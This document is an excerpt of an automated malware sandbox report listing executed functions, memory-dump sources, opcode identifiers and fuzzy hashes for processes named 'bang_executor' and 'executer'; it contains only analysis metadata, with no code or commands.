                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: aee003da797d3ad160f679e0ff818c2cabdde515b0f893c7072e989fe677c3e1
                                        • Instruction ID: 8cb2bc38240766fd597d75e3dec8c612ab2e24aa0363cd88570e725251cb1702
                                        • Opcode Fuzzy Hash: aee003da797d3ad160f679e0ff818c2cabdde515b0f893c7072e989fe677c3e1
                                        • Instruction Fuzzy Hash: 0CC0123164075096E63057717C4DBC72E586B14755F064459F541DA1C1D6E6CC8586A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFD9BA10E65 Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fcbbae26e2b8642537e62e0aa95e5011e745aa4fcff7ad1b788cd10be309c41
                                        • Instruction ID: bc0974e991fc6e92e4a758a72b095f0810b7aff5add2372f42cc8e3733ccadfd
                                        • Opcode Fuzzy Hash: 2fcbbae26e2b8642537e62e0aa95e5011e745aa4fcff7ad1b788cd10be309c41
                                        • Instruction Fuzzy Hash: 6A81B52060EBCE4FE786DB2CC4619AABFB1EF57290B5541E7D448CB29BC9296C85C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10840 Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;M_I$<M_I$=M_I$>M_I
                                        • API String ID: 0-1360018315
                                        • Opcode ID: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction ID: 47dceb8ec69e1f4a51cff05dcb518fe2290c2cdef9f825d08771b15968b695ea
                                        • Opcode Fuzzy Hash: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction Fuzzy Hash: 12E1E793A0F7C50BE7B14BA818791287E91FF52B5075992FBD0C48B1FBFC85AA068345
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA123F2 Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 280ccd1f1956b1cdf8cffc4f36a196b28f353d53e10f01e84d205e1f4cc943f2
                                        • Instruction ID: 86e7e579dc8273feb4492a65fb3459254cbb501e81c2669ea8c6ef78698905f8
                                        • Opcode Fuzzy Hash: 280ccd1f1956b1cdf8cffc4f36a196b28f353d53e10f01e84d205e1f4cc943f2
                                        • Instruction Fuzzy Hash: D4C1C730B19A4E4FDBD9EF68C4A4AA977E1FF58304F1405A9E41AC72D6CE75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA1204C Relevance: .2, Instructions: 226COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f81af82390b34a488e01b6fc9afec97b9a633f008661b552919aa819c7f19a99
                                        • Instruction ID: dd697e47355bd57b1f4bb4fbe07e68fca73e0799c741a78cd3e18c09b0c15db5
                                        • Opcode Fuzzy Hash: f81af82390b34a488e01b6fc9afec97b9a633f008661b552919aa819c7f19a99
                                        • Instruction Fuzzy Hash: 2071F730609B8E8FDBD5DF68C451AAA77B1FF59300F1046AAD459CB2D6CA35E981CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10CA9 Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bd2a8e55d55107673b45e539e1518f33b94fe44ea15b81ccebf141d9ab620d8
                                        • Instruction ID: 697f4cc44ad274172b986e3ccb689032b6fd803c18bc358b1110d145b902b699
                                        • Opcode Fuzzy Hash: 2bd2a8e55d55107673b45e539e1518f33b94fe44ea15b81ccebf141d9ab620d8
                                        • Instruction Fuzzy Hash: 5851DF21A0E6CE0EE7B6A77448312E57FA0DF47650F4A11FBD48CCB0E7D8596A1A8352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA12448 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction ID: 9cd582b4020dfeb18c494f30ab8896d30611ebee3e351ebb30d3b1b83dd844e1
                                        • Opcode Fuzzy Hash: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction Fuzzy Hash: B0517431B19A4E8FDBE8EF58C4A4ABA77E1FF54314B15057AE41AC3295CE74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10D15 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction ID: 35b785a12d6839cf58e5e7a08a0060397e8e30601a7e4a3a930b809a339132fb
                                        • Opcode Fuzzy Hash: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction Fuzzy Hash: 39110522F0E95E0AFBF4A7A848312F932D0EF45710F4321BAD41DC30E3DD593A0A0285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA110C9 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction ID: 4605afc34ef6ad8c8bf702768038511dd35422e233fcd23ba140cd9e6022184a
                                        • Opcode Fuzzy Hash: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction Fuzzy Hash: F5E0E511A0F7990FE7B993AD48623617EE2DB49610F0991EFD089C26E3C8C81C424352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA123BD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction ID: 5d56c48a675e8f28a9d8706649a076efef40420e0aeb451a33f264ee83ecf837
                                        • Opcode Fuzzy Hash: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction Fuzzy Hash: 57E0C221F4A81E89EB94B3B468B69FDB245DFC4204FC21871E42EC20CBCD6A29010182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA1230E Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction ID: cae1192e71673577aa90574db652e2464a774fe2f5b38a40059027ec9b81555f
                                        • Opcode Fuzzy Hash: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction Fuzzy Hash: 44E04F3145CB084BC354DF18D48049AB7E0FF94320F801B2EF05AC21B5DB7596818A82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10CF3 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction ID: 5feb92f41c138d6eb2bcfd40ad6767d2e0bbba01d14f6b1f5390d77fcc5b7118
                                        • Opcode Fuzzy Hash: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction Fuzzy Hash: B1C0123256D64D57D391AB10E451CEA7350FF90610F842B39F04B410A9DD6566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFD9B9F023D Relevance: 1.3, Instructions: 1334COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1630530388.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b9f0000_executer.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29ef1822e567fd1a9ebc295d8343ae38436c4c500e81750c28b56b3b331a7784
                                        • Instruction ID: 80db67e23dd32d37ec449ace335845bde0bf6a15dad3bbd21b07677c6f55a8da
                                        • Opcode Fuzzy Hash: 29ef1822e567fd1a9ebc295d8343ae38436c4c500e81750c28b56b3b331a7784
                                        • Instruction Fuzzy Hash: 54510752F1EAC65FE7626BB888755E87FA4EF5272070A00F7D498C70E3EE196C058351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B9F093D Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1630530388.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b9f0000_executer.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 829680f45b18536aa90d22d19446ee0ddb3fc56f2e81de3f49eb9f08244f277a
                                        • Instruction ID: 44917572707cf2930b953f4796733bcb0dcce68138708232e8db37fd2420fe80
                                        • Opcode Fuzzy Hash: 829680f45b18536aa90d22d19446ee0ddb3fc56f2e81de3f49eb9f08244f277a
                                        • Instruction Fuzzy Hash: 0F211021F7DC1E5ED699FF5884B19ED6355FF54A2074242B9D40EC32EBEE186E018680
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFD9BA10840 Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;M_I$<M_I$=M_I$>M_I
                                        • API String ID: 0-1360018315
                                        • Opcode ID: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction ID: 47dceb8ec69e1f4a51cff05dcb518fe2290c2cdef9f825d08771b15968b695ea
                                        • Opcode Fuzzy Hash: dfa9c970ce67b8b86b2216df188290881c618f062035ebd49a7a68bea1eae41a
                                        • Instruction Fuzzy Hash: 12E1E793A0F7C50BE7B14BA818791287E91FF52B5075992FBD0C48B1FBFC85AA068345
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA123F2 Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 363ad2478e2227e8c465e724d679a6ed020dca0f913125f535eccddaf4b0bd42
                                        • Instruction ID: 7bc4b332c7e3c39193ff870b0838a007eb8cb5f69af89fdfe3ed62531e24dcb1
                                        • Opcode Fuzzy Hash: 363ad2478e2227e8c465e724d679a6ed020dca0f913125f535eccddaf4b0bd42
                                        • Instruction Fuzzy Hash: 9AC1B630B19A4E8FDB99EF58C4A4AA977E1FF58304F1405A9E41AC72D6CF75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10E65 Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83267e949230865f6e59604963515d3d88de073977cc06f3b688e42ff8f3bff4
                                        • Instruction ID: 5fafc7928eacd701d28be550438660232d2545a6f5ee43ab151821b4c60c49fd
                                        • Opcode Fuzzy Hash: 83267e949230865f6e59604963515d3d88de073977cc06f3b688e42ff8f3bff4
                                        • Instruction Fuzzy Hash: 9E81E930A09B4E9FDB55DF1CC4A1998BBB1FF5A344B1506E6D009CB2ABC925BC85CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA1204C Relevance: .2, Instructions: 226COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98854fa2faedaf8e58aa03a3804dbf3e7e58e5c263f889e9d271ce7666f45858
                                        • Instruction ID: 035ca772654d32835862290e1c1bdc4cc8e06a6ac9236a21e80af3d5151709cc
                                        • Opcode Fuzzy Hash: 98854fa2faedaf8e58aa03a3804dbf3e7e58e5c263f889e9d271ce7666f45858
                                        • Instruction Fuzzy Hash: 8A71C870609B4F8FDB95DF58C491AAA77F1FF59304F1046AAD419CB2E9CA31E981CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA13B22 Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8eb70d7fb4a8f30ddff7c0c0f4d6ed1ed7fd689baf084b7a381e30a0d40e89
                                        • Instruction ID: 71c66c0a4f9c31bfe3d516e7968f17d8f526ef41073256ec2d42962b73ce5c20
                                        • Opcode Fuzzy Hash: ac8eb70d7fb4a8f30ddff7c0c0f4d6ed1ed7fd689baf084b7a381e30a0d40e89
                                        • Instruction Fuzzy Hash: D8512231A0CB4C4FDB59EF9898556A97BF1FF95310F0082AFD44DC7296CA34A845CB82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10CA9 Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ac73b209f8f398da242652a8293f90711f87568b83f81f13da8c92b6d59db13
                                        • Instruction ID: 7a186336939fce2171a771c99ba0121b75dfee17090f421a691ff4329f11cb62
                                        • Opcode Fuzzy Hash: 7ac73b209f8f398da242652a8293f90711f87568b83f81f13da8c92b6d59db13
                                        • Instruction Fuzzy Hash: D9510121A0E6CE0FE7B6977448325E57FA0DF47710F0A02FAD48CCB0E7D8596A1A8342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA12448 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction ID: 9cd582b4020dfeb18c494f30ab8896d30611ebee3e351ebb30d3b1b83dd844e1
                                        • Opcode Fuzzy Hash: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction Fuzzy Hash: B0517431B19A4E8FDBE8EF58C4A4ABA77E1FF54314B15057AE41AC3295CE74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10D15 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction ID: 35b785a12d6839cf58e5e7a08a0060397e8e30601a7e4a3a930b809a339132fb
                                        • Opcode Fuzzy Hash: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction Fuzzy Hash: 39110522F0E95E0AFBF4A7A848312F932D0EF45710F4321BAD41DC30E3DD593A0A0285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA110C9 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction ID: 4605afc34ef6ad8c8bf702768038511dd35422e233fcd23ba140cd9e6022184a
                                        • Opcode Fuzzy Hash: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction Fuzzy Hash: F5E0E511A0F7990FE7B993AD48623617EE2DB49610F0991EFD089C26E3C8C81C424352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA123BD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction ID: 5d56c48a675e8f28a9d8706649a076efef40420e0aeb451a33f264ee83ecf837
                                        • Opcode Fuzzy Hash: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction Fuzzy Hash: 57E0C221F4A81E89EB94B3B468B69FDB245DFC4204FC21871E42EC20CBCD6A29010182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA1230E Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction ID: cae1192e71673577aa90574db652e2464a774fe2f5b38a40059027ec9b81555f
                                        • Opcode Fuzzy Hash: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction Fuzzy Hash: 44E04F3145CB084BC354DF18D48049AB7E0FF94320F801B2EF05AC21B5DB7596818A82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA10CF3 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction ID: 5feb92f41c138d6eb2bcfd40ad6767d2e0bbba01d14f6b1f5390d77fcc5b7118
                                        • Opcode Fuzzy Hash: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction Fuzzy Hash: B1C0123256D64D57D391AB10E451CEA7350FF90610F842B39F04B410A9DD6566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FFD9BA00E65 Relevance: .2, Instructions: 230COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71fed7cc61dfc9cce052753ae5321ee0817550ec9fbceb446c49d535c3e8e984
                                        • Instruction ID: 2c7f05d557717f8f0295d073dffa8e5846ff3d2d8d1faec7beb5292d5ca2794c
                                        • Opcode Fuzzy Hash: 71fed7cc61dfc9cce052753ae5321ee0817550ec9fbceb446c49d535c3e8e984
                                        • Instruction Fuzzy Hash: 63610B30B6444E4FE794EF5CD461AEDB7A2EF99304FA40075E409CB296CDA6FC828742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA00AA8 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;N_I$<N_I
                                        • API String ID: 0-1294700092
                                        • Opcode ID: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction ID: 2fb920e58f9fdd9f8041f65ab6670639e9dedeb4b2abd0b44addf112d0ad7c43
                                        • Opcode Fuzzy Hash: 4886b61e286f1e7f180836ff87ed58b8a98a8b318185dc5022ef71ed8f87b632
                                        • Instruction Fuzzy Hash: 8A615BD3F0FAC90BE771479C18651282E83AF57A50B5901FBD0C8871BFB881AE0AC385
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BA0230E Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.1781622598.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7ffd9ba00000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {=N_^
                                        • API String ID: 0-135052102
                                        • Opcode ID: 02cc4d7a75c6e015104d7371357cbb2c8d983a5c4d59ab67861ce30ab5fbbae9
                                        • Instruction ID: 76e41b3a71f50bcb6b91c8dd403bd72ffd379427ce61d35f05777ad2b1dd0579
                                        • Opcode Fuzzy Hash: 02cc4d7a75c6e015104d7371357cbb2c8d983a5c4d59ab67861ce30ab5fbbae9
                                        • Instruction Fuzzy Hash: 89E04F31458B084BC354DF18D48049AB7E0FF95320F800B2EF09AC21B5DB7596818A82
                                        Uniqueness

